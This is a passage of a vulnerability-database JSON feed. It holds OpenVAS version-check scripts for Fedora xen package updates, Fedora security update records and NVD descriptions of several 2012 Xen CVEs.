OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\");\n script_id(864509);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-9386\");\n script_name(\"Fedora Update for xen FEDORA-2012-9386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~20.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3433", "CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-24T00:00:00", "id": "OPENVAS:1361412562310864639", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864639", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11785", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11785\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085369.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864639\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-24 09:54:16 +0530 (Fri, 24 Aug 2012)\");\n script_cve_id(\"CVE-2012-3433\", \"CVE-2012-3432\", \"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11785\");\n script_name(\"Fedora Update for xen FEDORA-2012-11785\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xen on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:56:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3433", "CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2018-01-03T00:00:00", "published": "2012-08-24T00:00:00", "id": "OPENVAS:864639", "href": "http://plugins.openvas.org/nasl.php?oid=864639", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11785", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11785\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 16\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085369.html\");\n script_id(864639);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-24 09:54:16 +0530 (Fri, 24 Aug 2012)\");\n script_cve_id(\"CVE-2012-3433\", \"CVE-2012-3432\", \"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11785\");\n script_name(\"Fedora Update for xen FEDORA-2012-11785\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.4, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:1361412562310864494", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864494", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9399", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864494\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:34:52 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-9399\");\n script_name(\"Fedora Update for xen FEDORA-2012-9399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xen on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~8.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-05T21:26:27", "published": "2012-08-05T21:26:27", "id": "FEDORA:A2013212DB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.2-24.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-05T21:31:48", "published": "2012-08-05T21:31:48", "id": "FEDORA:638FD21667", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.2-9.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-21T09:48:25", "published": "2012-08-21T09:48:25", "id": "FEDORA:8E44A20A90", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-2.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:52:23", "published": "2012-06-26T00:52:23", "id": "FEDORA:00A04209F2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.2-20.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-21T09:53:53", "published": "2012-08-21T09:53:53", "id": "FEDORA:403F220D9F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.3-1.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:42:08", "published": "2012-06-26T00:42:08", "id": "FEDORA:0275A21469", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.2-8.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1583", "CVE-2011-1898", "CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:41:50", "published": "2012-06-26T00:41:50", "id": "FEDORA:4C1E320FD7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: xen-4.1.2-8.fc15", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-09-17T17:45:19", "published": "2012-09-17T17:45:19", "id": "FEDORA:C1281214A6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-4.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-09-17T18:00:53", "published": "2012-09-17T18:00:53", "id": "FEDORA:63A4E21779", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.3-2.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411", "CVE-2012-4544"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-11-09T18:01:40", "published": "2012-11-09T18:01:40", "id": "FEDORA:A80012051E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-5.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:06:05", "description": "Xen 4.0, and 4.1, when running a 64-bit PV guest on \"older\" AMD CPUs, does not properly protect against a certain AMD processor bug, which allows local guest OS users to cause a denial of service (host hang) via sequential execution of instructions across a non-canonical boundary, a different vulnerability than CVE-2012-0217.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-2934", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2934"], "modified": "2014-05-05T05:11:00", "cpe": ["cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.0.0"], "id": "CVE-2012-2934", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2934", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:4.1.0:-:*:*:*:*:x64:*", "cpe:2.3:o:xen:xen:4.0.0:-:*:*:*:*:x64:*"]}, {"lastseen": "2020-10-03T12:06:06", "description": "The handle_mmio function in arch/x86/hvm/io.c in the MMIO operations emulator for Xen 3.3 and 4.x, when running an HVM guest, does not properly reset certain state information between emulation cycles, which allows local guest OS users to cause a denial of service (guest OS crash) via unspecified operations on MMIO regions.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-3432", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3432"], "modified": "2013-10-11T03:44:00", "cpe": ["cpe:/o:xen:xen:4.1.1", "cpe:/o:xen:xen:4.0.3", "cpe:/o:xen:xen:4.0.4", "cpe:/o:xen:xen:4.2.0", "cpe:/o:xen:xen:4.0.1", "cpe:/o:xen:xen:4.0.2", "cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:3.3.0", "cpe:/o:xen:xen:4.1.3", "cpe:/o:xen:xen:4.0.0", "cpe:/o:xen:xen:4.1.2"], "id": "CVE-2012-3432", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3432", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:05:59", "description": "Xen 3.4, 4.0, and 4.1, when the guest OS has not registered a handler for a syscall or sysenter instruction, does not properly clear a flag for exception injection when injecting a General Protection Fault, which allows local PV guest OS users to cause a denial of service (guest crash) by later triggering an exception that would normally be handled within Xen.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-0218", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0218"], "modified": "2013-10-11T03:40:00", "cpe": ["cpe:/o:xen:xen:3.4.0", "cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.0.0"], "id": "CVE-2012-0218", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0218", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:20", "description": "The PyGrub boot loader in Xen unstable before changeset 25589:60f09d1ab1fe, 4.2.x, and 4.1.x allows local para-virtualized guest users to cause a denial of service (memory consumption) via a large (1) bzip2 or (2) lzma compressed kernel image.", "edition": 6, "cvss3": {}, "published": "2012-10-31T16:55:00", "title": "CVE-2012-2625", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.7, "vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2625"], "modified": "2018-04-13T13:00:00", "cpe": ["cpe:/o:xen:xen:4.1.1", "cpe:/o:xen:xen:4.2.0", "cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.1.3", "cpe:/o:xen:xen:4.1.2"], "id": "CVE-2012-2625", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2625", "cvss": {"score": 2.7, "vector": "AV:A/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:15", "description": "The x86-64 kernel system-call functionality in Xen 4.1.2 and earlier, as used in Citrix XenServer 6.0.2 and earlier and other products; Oracle Solaris 11 and earlier; illumos before r13724; Joyent SmartOS before 20120614T184600Z; FreeBSD before 9.0-RELEASE-p3; NetBSD 6.0 Beta and earlier; Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1; and possibly other operating systems, when running on an Intel processor, incorrectly uses the sysret path in cases where a certain address is not a canonical address, which allows local users to gain privileges via a crafted application. NOTE: because this issue is due to incorrect use of the Intel specification, it should have been split into separate identifiers; however, there was some value in preserving the original mapping of the multi-codebase coordinated-disclosure effort to a single identifier.\nPer: http://technet.microsoft.com/en-us/security/bulletin/ms12-042\n\n'This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2. Systems with AMD or ARM-based CPUs are not affected by this vulnerability.'", "edition": 6, "cvss3": {}, "published": "2012-06-12T22:55:00", "title": "CVE-2012-0217", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0217"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:xen:xen:4.1.1", "cpe:/o:xen:xen:4.0.3", "cpe:/o:xen:xen:4.0.4", "cpe:/a:citrix:xenserver:6.0.2", "cpe:/a:citrix:xenserver:6.0", "cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:xen:xen:4.0.1", "cpe:/o:netbsd:netbsd:6.0", "cpe:/o:xen:xen:4.0.2", "cpe:/o:xen:xen:4.1.0", "cpe:/o:sun:sunos:5.11", "cpe:/o:xen:xen:4.0.0", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:xen:xen:4.1.2", "cpe:/o:freebsd:freebsd:9.0", "cpe:/o:joyent:smartos:20120614", "cpe:/o:microsoft:windows_7:*", "cpe:/o:illumos:illumos:r13723"], "id": "CVE-2012-0217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0217", "cvss": {"score": 